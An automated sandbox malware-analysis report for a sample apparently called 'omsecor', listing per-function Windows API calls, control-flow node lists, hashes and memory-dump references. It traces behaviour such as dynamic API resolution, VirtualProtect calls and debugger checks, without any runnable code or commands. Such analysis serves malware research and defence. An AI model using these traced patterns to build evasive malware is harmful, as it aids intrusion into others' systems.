                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000012.00000002.2334309027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_18_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Control-flow Graph (graph image not reproduced; blocks 4012c0-4012e8: FindFirstFileA, call 401080)
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,6D368A53), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph (graph image not reproduced; blocks 407a98-407b24: GetModuleHandleA, GetProcAddress, VirtualProtect, call 407ab5, call 407b29)
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph (graph image not reproduced; blocks 407a59-407b24: call 407a98, GetModuleHandleA, GetProcAddress, VirtualProtect, call 407b29)
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph (graph image not reproduced; blocks 407ab5-407b24: GetProcAddress, VirtualProtect, GetModuleHandleA, call 407b29)
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph (graph image not reproduced; blocks 402f3e-402f97: HeapCreate, call 402ee3, call 405045, HeapDestroy)
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 103 402465-40246f 104 402471-402478 103->104 105 402480-402483 104->105 106 40247a-40247e 104->106 107 402600-402604 105->107 108 402489-402495 call 404c30 105->108 106->104 106->105 111 40249b-4024a5 call 404c30 108->111 112 4025cc-4025d8 GetStdHandle 108->112 118 4024b4-4024ba 111->118 119 4024a7-4024ae 111->119 114 4025da-4025dd 112->114 115 4025ff 112->115 114->115 117 4025df-4025f9 call 404b40 WriteFile 114->117 115->107 117->115 118->115 122 4024c0-4024db call 404bcb 118->122 119->112 119->118 125 4024ea-402506 GetModuleFileNameA 122->125 126 4024dd-4024e7 call 404121 122->126 128 402508-40251d call 404bcb 125->128 129 40252e-402539 call 404b40 125->129 126->125 128->129 137 40251f-40252b call 404121 128->137 135 402573 129->135 136 40253b-402560 call 404b40 call 404a82 129->136 139 402575-402586 call 404a11 135->139 136->135 151 402562-402571 call 404121 136->151 137->129 146 402595-4025a8 call 404a11 139->146 147 402588-402592 call 404121 139->147 155 4025b7-4025ca call 404854 146->155 156 4025aa-4025b4 call 404121 146->156 147->146 151->139 155->115 156->155
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 162 401e76-401e86 GetModuleHandleA 163 401e91-401ed9 GetProcAddress * 4 162->163 164 401e88-401e90 call 401bca 162->164 166 401ef1-401f10 163->166 167 401edb-401ee2 163->167 170 401f15-401f23 TlsAlloc 166->170 167->166 169 401ee4-401eeb 167->169 169->166 171 401eed-401eef 169->171 172 401ff5 170->172 173 401f29-401f34 TlsSetValue 170->173 171->166 171->170 174 401ff7-401ff9 172->174 173->172 175 401f3a-401f89 call 402419 call 401aaa * 4 call 403378 173->175 188 401ff0 call 401bca 175->188 189 401f8b-401fa6 call 401b21 175->189 188->172 189->188 194 401fa8-401fba call 404032 189->194 194->188 197 401fbc-401fd3 call 401b21 194->197 197->188 201 401fd5-401fee call 401c07 GetCurrentThreadId 197->201 201->174
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00401E9E
                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00401EAB
                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00401EB8
                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00401EC5
                          • TlsAlloc.KERNEL32 ref: 00401F15
                          • TlsSetValue.KERNEL32(00000000), ref: 00401F30
                          • __init_pointers.LIBCMT ref: 00401F3A
                          • __calloc_crt.LIBCMT ref: 00401FAF
                          • GetCurrentThreadId.KERNEL32 ref: 00401FDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                          • API String ID: 2125014093-3819984048
                          • Opcode ID: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction ID: 2b6f412a48510a2ea5e28321b190ff4220801d9e6bfc04da0c4d4af9d52f3434
                          • Opcode Fuzzy Hash: 354152662784ca78ebbfdb9d1e706067e68d0d363f7f71506686b96da0da82fe
                          • Instruction Fuzzy Hash: AF318F319483029BE7146F75AF05B063AA5AF40355712053FF861B22F5EF7C8490EB5E

                          Control-flow Graph (rendered graph not recoverable from this extraction; the node list below gives basic-block ranges, called APIs and edges, the executed/not-executed colouring is lost)
                          control_flow_graph 204 404854-404876 call 401b18 207 40492a-404934 204->207 208 40487c-40488b LoadLibraryA 204->208 211 404936-40493c 207->211 212 4049af-4049b7 207->212 209 404891-4048a1 GetProcAddress 208->209 210 404a0a 208->210 209->210 215 4048a7-4048e9 call 401aaa GetProcAddress call 401aaa GetProcAddress call 401aaa call 4021f2 209->215 216 404a0c-404a10 210->216 211->212 217 40493e-404957 call 401b21 * 2 211->217 213 4049b9-4049c2 call 401b21 212->213 214 4049ea-4049f8 call 401b21 212->214 213->214 227 4049c4-4049cb 213->227 214->210 226 4049fa-404a08 214->226 244 4048f8-4048fc 215->244 245 4048eb-4048f5 call 404121 215->245 217->212 232 404959-40495b 217->232 226->216 227->214 237 4049cd-4049d5 227->237 232->212 236 40495d-404961 232->236 246 404963-404974 236->246 247 40497c-404988 call 402229 236->247 237->214 239 4049d7-4049e0 call 401b21 237->239 239->214 252 4049e2-4049e7 239->252 244->207 250 4048fe-404914 GetProcAddress call 401aaa 244->250 245->244 246->247 258 404976-40497a 246->258 259 404997-40499b 247->259 260 40498a-404994 call 404121 247->260 250->207 264 404916-404925 GetProcAddress call 401aaa 250->264 252->214 258->212 258->247 262 4049a6-4049ad 259->262 263 40499d-4049a4 259->263 260->259 262->214 263->214 264->207
                          APIs
                          • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00404881
                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040489D
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                            • Part of subcall function 00401AAA: TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048BA
                            • Part of subcall function 00401AAA: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                            • Part of subcall function 00401AAA: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004048CF
                          • __invoke_watson.LIBCMT ref: 004048F0
                            • Part of subcall function 00404121: _memset.LIBCMT ref: 004041AD
                            • Part of subcall function 00404121: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 004041CB
                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 00000017.00000002.2375599383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000017.00000002.2375527486.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375599383.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 00000017.00000002.2375742037.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_23_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E
